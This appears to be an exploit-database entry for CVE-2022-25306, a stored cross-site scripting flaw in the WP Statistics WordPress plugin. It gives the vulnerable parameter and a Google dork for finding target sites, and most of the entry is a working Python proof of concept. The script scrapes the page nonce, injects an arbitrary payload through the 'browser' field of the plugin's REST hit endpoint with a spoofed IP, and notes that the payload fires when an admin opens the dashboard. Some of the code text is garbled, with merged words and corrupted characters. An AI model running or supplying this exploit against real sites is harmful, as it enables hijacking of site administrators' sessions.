/wp-content/plugins/wp-statistics/includes/class-wp-statistics-visitor.php and others
Vulnerable Parameters
browser
Google Dork
inurl:/wp-content/plugins/wp-statistics
CVE
CVE-2022-25306
Proof of Concept
importrequests, re, json, urllib.parsefromrandomimportrandintwpurl=input('\nWordPress URL: ')
payload=input('\nPayload: ')
wp_session=requests.session()
wp=wp_session.get(wpurl)
wp_nonce=re.search(r'_wpnonce=(.*?)&wp_statistics_hit', wp.text).group(1)
headers= {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload=urllib.parse.quote_plus(payload)
random_ip='.'.join([str(randint(0,255)) forxinrange(4)])
exploit=f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser={payload}&platform=&version=&referred=&ip={random_ip}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0'exploit_url=wpurl+exploitprint(f'\nSending XSS payload: {exploit_url}')
wp=wp_session.get(exploit_url, headers=headers)
data=wp.json()
print("\nResponse: \n"+json.dumps(data, sort_keys=True, indent=4))
print(f'\nXSS will trigger when admin visits WP Statistics Dashboard at {wpurl}/wp-admin/admin.php?page=wps_overview_page or other pages depending on the payload used.')